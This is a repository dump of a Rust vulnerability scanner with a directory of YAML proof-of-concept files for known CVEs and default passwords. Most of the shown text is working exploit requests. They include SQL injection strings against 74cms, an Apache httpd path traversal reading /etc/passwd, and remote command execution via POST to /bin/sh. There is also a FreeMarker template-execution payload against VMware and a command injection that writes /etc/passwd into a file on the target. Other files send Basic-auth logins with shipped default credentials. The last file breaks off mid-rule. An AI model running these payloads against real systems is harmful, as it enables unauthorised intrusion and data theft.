├── .github └── workflows │ └── release.yml ├── Cargo.toml ├── LICENSE.txt ├── README.md ├── doc ├── gzh.jpg └── wx.jpg └── src ├── core ├── host_discovery.rs ├── mod.rs ├── nmap-service-probes.txt ├── port_scanner.rs ├── result_storage.rs ├── scanner.rs └── service_info.rs ├── lib.rs ├── main.rs └── plugins ├── config.yaml ├── mod.rs ├── pocs ├── 74cms-sqli-1.yml ├── 74cms-sqli-2.yml ├── 74cms-sqli.yml ├── CVE-2017-7504-Jboss-serialization-RCE.yml ├── CVE-2022-22947.yml ├── CVE-2022-22954-VMware-RCE.yml ├── CVE-2022-26134.yml ├── Hotel-Internet-Manage-RCE.yml ├── Struts2-062-cve-2021-31805-rce.yml ├── active-directory-certsrv-detect.yml ├── activemq-cve-2016-3088.yml ├── activemq-default-password.yml ├── airflow-unauth.yml ├── alibaba-canal-default-password.yml ├── alibaba-canal-info-leak.yml ├── alibaba-nacos-v1-auth-bypass.yml ├── alibaba-nacos.yml ├── amtt-hiboss-server-ping-rce.yml ├── apache-ambari-default-password.yml ├── apache-axis-webservice-detect.yml ├── apache-druid-cve-2021-36749.yml ├── apache-flink-upload-rce.yml ├── apache-httpd-cve-2021-40438-ssrf.yml ├── apache-httpd-cve-2021-41773-path-traversal.yml ├── apache-httpd-cve-2021-41773-rce.yml ├── apache-kylin-unauth-cve-2020-13937.yml ├── apache-nifi-api-unauthorized-access.yml ├── apache-ofbiz-cve-2018-8033-xxe.yml ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml ├── aspcms-backend-leak.yml ├── backup-file.yml ├── bash-cve-2014-6271.yml ├── bt742-pma-unauthorized-access.yml ├── cacti-weathermap-file-write.yml ├── chinaunicom-modem-default-password.yml ├── cisco-cve-2020-3452-readfile.yml ├── citrix-cve-2019-19781-path-traversal.yml ├── citrix-cve-2020-8191-xss.yml ├── citrix-cve-2020-8193-unauthorized.yml ├── citrix-xenmobile-cve-2020-8209.yml ├── coldfusion-cve-2010-2861-lfi.yml ├── confluence-cve-2015-8399.yml ├── confluence-cve-2019-3396-lfi.yml ├── confluence-cve-2021-26084.yml ├── confluence-cve-2021-26085-arbitrary-file-read.yml ├── consul-rexec-rce.yml ├── consul-service-rce.yml ├── 
coremail-cnvd-2019-16798.yml ├── couchcms-cve-2018-7662.yml ├── couchdb-cve-2017-12635.yml ├── couchdb-unauth.yml ├── craftcms-seomatic-cve-2020-9757-rce.yml ├── datang-ac-default-password-cnvd-2021-04128.yml ├── dedecms-carbuyaction-fileinclude.yml ├── dedecms-cve-2018-6910.yml ├── dedecms-cve-2018-7700-rce.yml ├── dedecms-guestbook-sqli.yml ├── dedecms-membergroup-sqli.yml ├── dedecms-url-redirection.yml ├── discuz-ml3x-cnvd-2019-22239.yml ├── discuz-v72-sqli.yml ├── discuz-wechat-plugins-unauth.yml ├── discuz-wooyun-2010-080723.yml ├── django-CVE-2018-14574.yml ├── dlink-850l-info-leak.yml ├── dlink-cve-2019-16920-rce.yml ├── dlink-cve-2019-17506.yml ├── dlink-cve-2020-25078-account-disclosure.yml ├── dlink-cve-2020-9376-dump-credentials.yml ├── dlink-dsl-2888a-rce.yml ├── docker-api-unauthorized-rce.yml ├── docker-registry-api-unauth.yml ├── dotnetcms-sqli.yml ├── draytek-cve-2020-8515.yml ├── druid-monitor-unauth.yml ├── drupal-cve-2014-3704-sqli.yml ├── drupal-cve-2018-7600-rce.yml ├── drupal-cve-2019-6340.yml ├── dubbo-admin-default-password.yml ├── duomicms-sqli.yml ├── dvr-cve-2018-9995.yml ├── e-office-v10-sql-inject.yml ├── e-office-v9-upload-cnvd-2021-49104.yml ├── e-zkeco-cnvd-2020-57264-read-file.yml ├── ecology-arbitrary-file-upload.yml ├── ecology-filedownload-directory-traversal.yml ├── ecology-javabeanshell-rce.yml ├── ecology-springframework-directory-traversal.yml ├── ecology-syncuserinfo-sqli.yml ├── ecology-v8-sqli.yml ├── ecology-validate-sqli.yml ├── ecology-workflowcentertreedata-sqli.yml ├── ecology-workflowservicexml.yml ├── ecshop-cnvd-2020-58823-sqli.yml ├── ecshop-collection-list-sqli.yml ├── ecshop-login-sqli.yml ├── ecshop-rce.yml ├── eea-info-leak-cnvd-2021-10543.yml ├── elasticsearch-cve-2014-3120.yml ├── elasticsearch-cve-2015-1427.yml ├── elasticsearch-cve-2015-3337-lfi.yml ├── elasticsearch-cve-2015-5531.yml ├── elasticsearch-unauth.yml ├── etcd-unauth.yml ├── etcd-v3-unauth.yml ├── etouch-v2-sqli.yml ├── 
exchange-cve-2021-26855-ssrf.yml ├── eyou-rce.yml ├── ezoffice-dpwnloadhttp.jsp-filedownload.yml ├── f5-cve-2021-22986.yml ├── f5-cve-2022-1388.yml ├── f5-tmui-cve-2020-5902-rce.yml ├── fangweicms-sqli.yml ├── fckeditor-info.yml ├── feifeicms-lfr.yml ├── finecms-sqli.yml ├── finereport-directory-traversal.yml ├── finereport-v8-arbitrary-file-read.yml ├── flexpaper-cve-2018-11686.yml ├── flink-jobmanager-cve-2020-17519-lfi.yml ├── fortigate-cve-2018-13379-readfile.yml ├── frp-dashboard-unauth.yml ├── gateone-cve-2020-35736.yml ├── gilacms-cve-2020-5515.yml ├── gitlab-graphql-info-leak-cve-2020-26413.yml ├── gitlab-ssrf-cve-2021-22214.yml ├── gitlist-rce-cve-2018-1000533.yml ├── glassfish-cve-2017-1000028-lfi.yml ├── go-pprof-leak.yml ├── gocd-cve-2021-43287.yml ├── h2-database-web-console-unauthorized-access.yml ├── h3c-imc-rce.yml ├── h3c-secparh-any-user-login.yml ├── h5s-video-platform-cnvd-2020-67113-unauth.yml ├── hadoop-yarn-unauth.yml ├── hanming-video-conferencing-file-read.yml ├── harbor-cve-2019-16097.yml ├── hikvision-cve-2017-7921.yml ├── hikvision-gateway-data-file-read.yml ├── hikvision-info-leak.yml ├── hikvision-intercom-service-default-password.yml ├── hikvision-showfile-file-read.yml ├── hikvision-unauthenticated-rce-cve-2021-36260.yml ├── hjtcloud-arbitrary-fileread.yml ├── hjtcloud-directory-file-leak.yml ├── huawei-home-gateway-hg659-fileread.yml ├── ifw8-router-cve-2019-16313.yml ├── iis-put-getshell.yml ├── influxdb-unauth.yml ├── inspur-tscev4-cve-2020-21224-rce.yml ├── jboss-cve-2010-1871.yml ├── jboss-unauth.yml ├── jeewms-showordownbyurl-fileread.yml ├── jellyfin-file-read-cve-2021-21402.yml ├── jenkins-cve-2018-1000600.yml ├── jenkins-cve-2018-1000861-rce.yml ├── jenkins-unauthorized-access.yml ├── jetty-cve-2021-28164.yml ├── jira-cve-2019-11581.yml ├── jira-cve-2019-8442.yml ├── jira-cve-2019-8449.yml ├── jira-cve-2020-14179.yml ├── jira-cve-2020-14181.yml ├── jira-ssrf-cve-2019-8451.yml ├── joomla-cnvd-2019-34135-rce.yml ├── 
joomla-component-vreview-sql.yml ├── joomla-cve-2015-7297-sqli.yml ├── joomla-cve-2017-8917-sqli.yml ├── joomla-cve-2018-7314-sql.yml ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml ├── jumpserver-unauth-rce.yml ├── jupyter-notebook-unauthorized-access.yml ├── kafka-manager-unauth.yml ├── kibana-cve-2018-17246.yml ├── kibana-unauth.yml ├── kingdee-eas-directory-traversal.yml ├── kingsoft-v8-default-password.yml ├── kingsoft-v8-file-read.yml ├── kong-cve-2020-11710-unauth.yml ├── kubernetes-unauth.yml ├── kyan-network-monitoring-account-password-leakage.yml ├── landray-oa-custom-jsp-fileread.yml ├── lanproxy-cve-2021-3019-lfi.yml ├── laravel-cve-2021-3129.yml ├── laravel-debug-info-leak.yml ├── laravel-improper-webdir.yml ├── maccms-rce.yml ├── maccmsv10-backdoor.yml ├── metinfo-cve-2019-16996-sqli.yml ├── metinfo-cve-2019-16997-sqli.yml ├── metinfo-cve-2019-17418-sqli.yml ├── metinfo-file-read.yml ├── metinfo-lfi-cnvd-2018-13393.yml ├── minio-default-password.yml ├── mongo-express-cve-2019-10758.yml ├── mpsec-isg1000-file-read.yml ├── msvod-sqli.yml ├── myucms-lfr.yml ├── nagio-cve-2018-10735.yml ├── nagio-cve-2018-10736.yml ├── nagio-cve-2018-10737.yml ├── nagio-cve-2018-10738.yml ├── natshell-arbitrary-file-read.yml ├── netentsec-icg-default-password.yml ├── netentsec-ngfw-rce.yml ├── netgear-cve-2017-5521.yml ├── nextjs-cve-2017-16877.yml ├── nexus-cve-2019-7238.yml ├── nexus-cve-2020-10199.yml ├── nexus-cve-2020-10204.yml ├── nexus-default-password.yml ├── nexusdb-cve-2020-24571-path-traversal.yml ├── nhttpd-cve-2019-16278.yml ├── node-red-dashboard-file-read-cve-2021-3223.yml ├── novnc-url-redirection-cve-2021-3654.yml ├── nps-default-password.yml ├── ns-asg-file-read.yml ├── nsfocus-uts-password-leak.yml ├── nuuo-file-inclusion.yml ├── odoo-file-read.yml ├── openfire-cve-2019-18394-ssrf.yml ├── opentsdb-cve-2020-35476-rce.yml ├── panabit-gateway-default-password.yml ├── panabit-ixcache-default-password.yml ├── pandorafms-cve-2019-20224-rce.yml ├── 
pbootcms-database-file-download.yml ├── php-cgi-cve-2012-1823.yml ├── phpcms-cve-2018-19127.yml ├── phpmyadmin-cve-2018-12613-file-inclusion.yml ├── phpmyadmin-setup-deserialization.yml ├── phpok-sqli.yml ├── phpshe-sqli.yml ├── phpstudy-backdoor-rce.yml ├── phpstudy-nginx-wrong-resolve.yml ├── phpunit-cve-2017-9841-rce.yml ├── powercreator-arbitrary-file-upload.yml ├── prometheus-url-redirection-cve-2021-29622.yml ├── pulse-cve-2019-11510.yml ├── pyspider-unauthorized-access.yml ├── qibocms-sqli.yml ├── qilin-bastion-host-rce.yml ├── qizhi-fortressaircraft-unauthorized.yml ├── qnap-cve-2019-7192.yml ├── rabbitmq-default-password.yml ├── rails-cve-2018-3760-rce.yml ├── razor-cve-2018-8770.yml ├── rconfig-cve-2019-16663.yml ├── resin-cnnvd-200705-315.yml ├── resin-inputfile-fileread-or-ssrf.yml ├── resin-viewfile-fileread.yml ├── rockmongo-default-password.yml ├── ruijie-eg-cli-rce.yml ├── ruijie-eg-file-read.yml ├── ruijie-eg-info-leak.yml ├── ruijie-eweb-rce-cnvd-2021-09650.yml ├── ruijie-nbr1300g-cli-password-leak.yml ├── ruijie-uac-cnvd-2021-14536.yml ├── ruoyi-management-fileread.yml ├── saltstack-cve-2020-16846.yml ├── saltstack-cve-2021-25282-file-write.yml ├── samsung-wea453e-default-pwd.yml ├── samsung-wea453e-rce.yml ├── samsung-wlan-ap-wea453e-rce.yml ├── sangfor-ad-download.php-filedownload.yml ├── sangfor-ba-rce.yml ├── sangfor-edr-arbitrary-admin-login.yml ├── sangfor-edr-cssp-rce.yml ├── sangfor-edr-tool-rce.yml ├── satellian-cve-2020-7980-rce.yml ├── seacms-before-v992-rce.yml ├── seacms-rce.yml ├── seacms-sqli.yml ├── seacms-v654-rce.yml ├── seacmsv645-command-exec.yml ├── secnet-ac-default-password.yml ├── seeyon-a6-employee-info-leak.yml ├── seeyon-a6-test-jsp-sql.yml ├── seeyon-ajax-unauthorized-access.yml ├── seeyon-cnvd-2020-62422-readfile.yml ├── seeyon-oa-a8-m-information-disclosure.yml ├── seeyon-oa-cookie-leak.yml ├── seeyon-session-leak.yml ├── seeyon-setextno-jsp-sql.yml ├── seeyon-unauthoried.yml ├── seeyon-wooyun-2015-0108235-sqli.yml 
├── seeyon-wooyun-2015-148227.yml ├── shiro-key.yml ├── shiziyu-cms-apicontroller-sqli.yml ├── shopxo-cnvd-2021-15822.yml ├── showdoc-default-password.yml ├── showdoc-uploadfile.yml ├── skywalking-cve-2020-9483-sqli.yml ├── solarwinds-cve-2020-10148.yml ├── solr-cve-2017-12629-xxe.yml ├── solr-cve-2019-0193.yml ├── solr-fileread.yml ├── solr-velocity-template-rce.yml ├── sonarqube-cve-2020-27986-unauth.yml ├── sonicwall-ssl-vpn-rce.yml ├── spark-api-unauth.yml ├── spark-webui-unauth.yml ├── spon-ip-intercom-ping-rce.yml ├── spring-actuator-heapdump-file.yml ├── spring-cloud-cve-2020-5405.yml ├── spring-cloud-cve-2020-5410.yml ├── spring-core-rce.yml ├── spring-cve-2016-4977.yml ├── springboot-cve-2021-21234.yml ├── springboot-env-unauth.yml ├── springcloud-cve-2019-3799.yml ├── sql-file.yml ├── struts2-045.yml ├── struts2-046-1.yml ├── supervisord-cve-2017-11610.yml ├── swagger-ui-unauth.yml ├── tamronos-iptv-rce.yml ├── telecom-gateway-default-password.yml ├── tensorboard-unauth.yml ├── terramaster-cve-2020-15568.yml ├── terramaster-tos-rce-cve-2020-28188.yml ├── thinkadmin-v6-readfile.yml ├── thinkcmf-lfi.yml ├── thinkcmf-write-shell.yml ├── thinkphp-v6-file-write.yml ├── thinkphp5-controller-rce.yml ├── thinkphp5023-method-rce.yml ├── tianqing-info-leak.yml ├── tomcat-cve-2017-12615-rce.yml ├── tomcat-cve-2018-11759.yml ├── tomcat-manager-weak.yml ├── tongda-insert-sql-inject.yml ├── tongda-meeting-unauthorized-access.yml ├── tongda-oa-v11.9-api.ali.php-upload.yml ├── tongda-user-session-disclosure.yml ├── tongda-v2017-uploadfile.yml ├── tpshop-directory-traversal.yml ├── tpshop-sqli.yml ├── tvt-nvms-1000-file-read-cve-2019-20085.yml ├── typecho-rce.yml ├── ueditor-cnvd-2017-20077-file-upload.yml ├── uwsgi-cve-2018-7490.yml ├── vbulletin-cve-2019-16759-bypass.yml ├── vbulletin-cve-2019-16759.yml ├── vmware-vcenter-arbitrary-file-read.yml ├── vmware-vcenter-cve-2021-21985-rce.yml ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml ├── 
vmware-vrealize-cve-2021-21975-ssrf.yml ├── weaver-E-Cology-getSqlData-sqli.yml ├── weaver-ebridge-file-read.yml ├── weaver-oa-eoffice-v9-upload-getshell.yml ├── weblogic-console-weak.yml ├── weblogic-cve-2017-10271.yml ├── weblogic-cve-2019-2725.yml ├── weblogic-cve-2019-2729-1.yml ├── weblogic-cve-2019-2729-2.yml ├── weblogic-cve-2020-14750.yml ├── weblogic-ssrf.yml ├── webmin-cve-2019-15107-rce.yml ├── weiphp-path-traversal.yml ├── weiphp-sql.yml ├── wifisky-default-password-cnvd-2021-39012.yml ├── wordpress-cve-2019-19985-infoleak.yml ├── wordpress-ext-adaptive-images-lfi.yml ├── wordpress-ext-mailpress-rce.yml ├── wuzhicms-v410-sqli.yml ├── xdcms-sql.yml ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml ├── xunchi-cnvd-2020-23735-file-read.yml ├── yapi-rce.yml ├── yccms-rce.yml ├── yonyou-grp-u8-sqli-to-rce.yml ├── yonyou-grp-u8-sqli.yml ├── yonyou-nc-arbitrary-file-upload.yml ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml ├── yonyou-u8-oa-sqli.yml ├── youphptube-encoder-cve-2019-5127.yml ├── youphptube-encoder-cve-2019-5128.yml ├── youphptube-encoder-cve-2019-5129.yml ├── yungoucms-sqli.yml ├── zabbix-authentication-bypass.yml ├── zabbix-cve-2016-10134-sqli.yml ├── zabbix-default-password.yml ├── zcms-v3-sqli.yml ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml ├── zeroshell-cve-2019-12725-rce.yml ├── zimbra-cve-2019-9670-xxe.yml └── zzcms-zsmanage-sqli.yml ├── rabbitmq_plugin.rs ├── ssh_plugin.rs ├── web_plugin.rs ├── web_poc_plugin.rs └── web_title_plugin.rs /doc/gzh.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TheBlindM/Tyan/4d898e995aaab852a33250a8922d884a935e6aec/doc/gzh.jpg -------------------------------------------------------------------------------- /doc/wx.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TheBlindM/Tyan/4d898e995aaab852a33250a8922d884a935e6aec/doc/wx.jpg 
-------------------------------------------------------------------------------- /src/core/mod.rs: --------------------------------------------------------------------------------
// Submodules of the scanner core; lib.rs re-exports the public types from these.
1 | pub mod host_discovery; 2 | pub mod port_scanner; 3 | pub mod scanner; 4 | pub mod service_info; 5 | pub mod result_storage; 6 | -------------------------------------------------------------------------------- /src/lib.rs: --------------------------------------------------------------------------------
// Crate root: declares the core and plugins modules and re-exports the host-discovery,
// port-scanner and service-identification types so callers need not spell out the core path.
1 | pub mod core; 2 | pub mod plugins; 3 | 4 | pub use crate::core::host_discovery::HostDiscovery; 5 | pub use crate::core::port_scanner::PortScanner; 6 | pub use crate::core::service_info::{identify_service, ScanResult, ServiceInfo, ServiceScanOptions, ServiceScanner}; 7 | -------------------------------------------------------------------------------- /src/plugins/pocs/74cms-sqli-1.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-1
# A match requires the response to echo md5(rand) for a per-run random value, so a static or cached page cannot match.
# NOTE(review): as rendered here the body begins with "]>" (the XML prologue before it was lost to tag stripping), and the
# path carries the literal characters "\xc3\x97", which a YAML plain scalar does not unescape; compare both with the upstream file.
2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce= 7 | headers: 8 | Content-Type: 'text/xml' 9 | body: ]>&test;111112331%' union select md5({{rand}})# 10 | follow_redirects: false 11 | expression: | 12 | response.body.bcontains(bytes(md5(string(rand)))) 13 | detail: 14 | author: betta(https://github.com/betta-cyber) 15 | links: 16 | - https://www.uedbox.com/post/29340 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/74cms-sqli-2.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-2
# Same random-token check as the -1 variant, via a GET parameter: a hit means the server echoed md5(rand),
# which only a successful injection produces.
2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23 7 | expression: | 8 | 
response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: rexus 11 | links: 12 | - https://www.uedbox.com/post/30019/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/74cms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli
# NOTE(review): unlike the -1/-2 variants the needle here is a fixed 31-hex-digit string, so any page that happens to
# contain it (including a cached or replayed response) matches; a randomised token would be a stronger signal.
2 | rules: 3 | - method: GET 4 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a 5 | expression: | 6 | response.body.bcontains(b"ef775988943825d2871e1cfa75473ec") 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://www.t00ls.net/articles-54436.html 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE
# Banner check only: a 200 carrying "This is the JBossMQ HTTP-IL" shows the JBossMQ HTTP invocation-layer servlet
# is exposed; the rule does not exercise the deserialization flaw itself, so a hit is "reachable", not "exploitable".
2 | rules: 3 | - method: GET 4 | path: /jbossmq-httpil/HTTPServerILServlet 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL') 7 | detail: 8 | author: mamba 9 | description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号" 10 | links: 11 | - https://github.com/chaosec2021 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/CVE-2022-22954-VMware-RCE.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-CVE-2022-22954-VMware-RCE
# NOTE(review): not a passive fingerprint — the deviceUdid value is a FreeMarker template expression that is evaluated
# on a vulnerable host, so this probe is intrusive. The rule expects a 400 whose body matches the regex "device id:".
2 | rules: 3 | - method: GET 4 | path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d 5 | expression: | 6 | response.status == 400 && "device id:".bmatches(response.body) 7 | detail: 8 | author: mamba 9 | description: "CVE-2022-22954-VMware-RCE by chaosec公众号" 10 | links: 11 | - https://github.com/chaosec2021 12 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/Hotel-Internet-Manage-RCE.yml: -------------------------------------------------------------------------------- 1 | name: Hotel-Internet-Manage-RCE
# NOTE(review): intrusive probe — the ip parameter appends a shell command that writes /etc/passwd to ../../Test.txt
# on the target, leaving an artifact behind, while the expression only checks for "parent.doTestResult", which does
# not prove the command ran. The file also departs from the others: no poc-yaml- prefix, author "test", a
# non-standard "Affected Version" key, and a reference link that is a bare IP address.
2 | rules: 3 | - method: GET 4 | path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"parent.doTestResult") 7 | detail: 8 | author: test 9 | Affected Version: "Hotel Internet Billing & Operation Support System" 10 | links: 11 | - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8 12 | 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/active-directory-certsrv-detect.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-active-directory-certsrv-detect
# Fingerprint only: an IIS 401 on /certsrv offering both Negotiate and NTLM is taken as an AD Certificate Services
# web-enrollment endpoint. The "Www-Authenticate" in response.headers test appears twice; the second one is redundant.
2 | rules: 3 | - method: GET 4 | path: /certsrv/certrqad.asp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM") 8 | detail: 9 | author: AgeloVito 10 | links: 11 | - https://www.cnblogs.com/EasonJim/p/6859345.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/activemq-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-activemq-default-password
# Two-step check: /admin/ must first answer 401, then the same path with Basic credentials admin:admin must answer
# 200 with the console banner — a hit means the shipped default login is still active.
# NOTE(review): the second body needle spans several lines in this rendering; its surrounding markup was stripped.
2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 401 && response.body.bcontains(b"Unauthorized") 7 | - method: GET 8 | path: /admin/ 9 | headers: 10 | Authorization: Basic YWRtaW46YWRtaW4= 11 | expression: | 12 
| response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") 13 | detail: 14 | author: pa55w0rd(www.pa55w0rd.online/) 15 | links: 16 | - https://blog.csdn.net/ge00111/article/details/72765210 -------------------------------------------------------------------------------- /src/plugins/pocs/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth
# An unauthenticated /admin/ that returns the "Airflow - DAGs" page is a hit. NOTE(review): as in the ActiveMQ PoC,
# the second needle is split across lines here because its markup was stripped in this rendering.
2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | links: 10 | - http://airflow.apache.org/ 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/alibaba-canal-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-default-password
# Step 1 confirms the Canal admin login endpoint; step 2 posts the default admin/123456 credentials and expects
# code 20000 with a token in the reply — a hit means the default account is still usable.
2 | rules: 3 | - method: POST 4 | path: /api/v1/user/login 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login") 7 | - method: POST 8 | path: /api/v1/user/login 9 | headers: 10 | Content-Type: application/json 11 | body: >- 12 | {"username":"admin","password":"123456"} 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"") 16 | detail: 17 | author: jweny(https://github.com/jweny) 18 | links: 19 | - https://www.cnblogs.com/xiexiandong/p/12888582.html 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/alibaba-canal-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-info-leak
# A 200 JSON config dump exposing the aliyun accessKey/secretKey fields — a credential leak, not just a fingerprint.
# NOTE(review): both needles start with "ncanal." rather than "canal."; confirm that prefix is intended.
2 | rules: 3 | - method: GET 4 | path: /api/v1/canal/config/1/1 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | info: alibaba Canal info leak 11 | links: 12 | - https://my.oschina.net/u/4581879/blog/4753320 -------------------------------------------------------------------------------- /src/plugins/pocs/alibaba-nacos.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-nacos
# Fingerprint only: any /nacos/ page (redirects followed) containing "Nacos" matches. The "login" entry under detail
# records the default credentials for the operator; the rule itself never sends them.
2 | rules: 3 | - 
method: GET 4 | path: /nacos/ 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(bytes("Nacos")) 8 | detail: 9 | author: AgeloVito 10 | info: alibaba-nacos 11 | login: nacos/nacos 12 | links: 13 | - https://blog.csdn.net/caiqiiqi/article/details/112005424 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-ambari-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ambari-default-password
# Sends Basic admin:admin and expects the admin user's privilege listing back; a hit means the default
# administrator password is unchanged.
2 | rules: 3 | - method: GET 4 | path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name 5 | headers: 6 | Authorization: Basic YWRtaW46YWRtaW4= 7 | expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR") 8 | detail: 9 | author: wulalalaaa(https://github.com/wulalalaaa) 10 | links: 11 | - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-axis-webservice-detect.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-axis-webservice-detect
# Probes a list of common Axis/Axis2 service paths for a services page carrying WSDL links.
# NOTE(review): this file uses "sets:" whereas the other PoCs use "set:"; if the engine only recognises "set:",
# {{path}} is never substituted and every request goes to the literal "/{{path}}".
2 | sets: 3 | path: 4 | - services 5 | - servlet/AxisaxiServlet 6 | - servlet/AxisServlet 7 | - services/listServices 8 | - services/FreeMarkerService 9 | - services/AdminService 10 | - axis/services 11 | - axis2/services 12 | - axis/servlet/AxisServlet 13 | - axis2/servlet/AxisServlet 14 | - axis2/services/listServices 15 | - axis/services/FreeMarkerService 16 | - axis/services/AdminService 17 | rules: 18 | - method: GET 19 | path: /{{path}} 20 | expression: | 21 | response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl">') 22 | detail: 23 | author: AgeloVito 24 | links: 25 | - https://paper.seebug.org/1489 26 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/apache-httpd-cve-2021-41773-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal 2 | groups: 3 | cgibin: 4 | - method: GET 5 | path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | icons: 9 | - method: GET 10 | path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 11 | expression: | 12 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 13 | detail: 14 | author: JingLing(https://github.com/shmilylty) 15 | links: 16 | - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ -------------------------------------------------------------------------------- /src/plugins/pocs/apache-httpd-cve-2021-41773-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 8 | body: echo;expr {{r1}} + {{r2}} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 11 | detail: 12 | author: B1anda0(https://github.com/B1anda0) 13 | links: 14 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | rules: 3 | - method: GET 4 | path: /kylin/api/admin/config 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && 
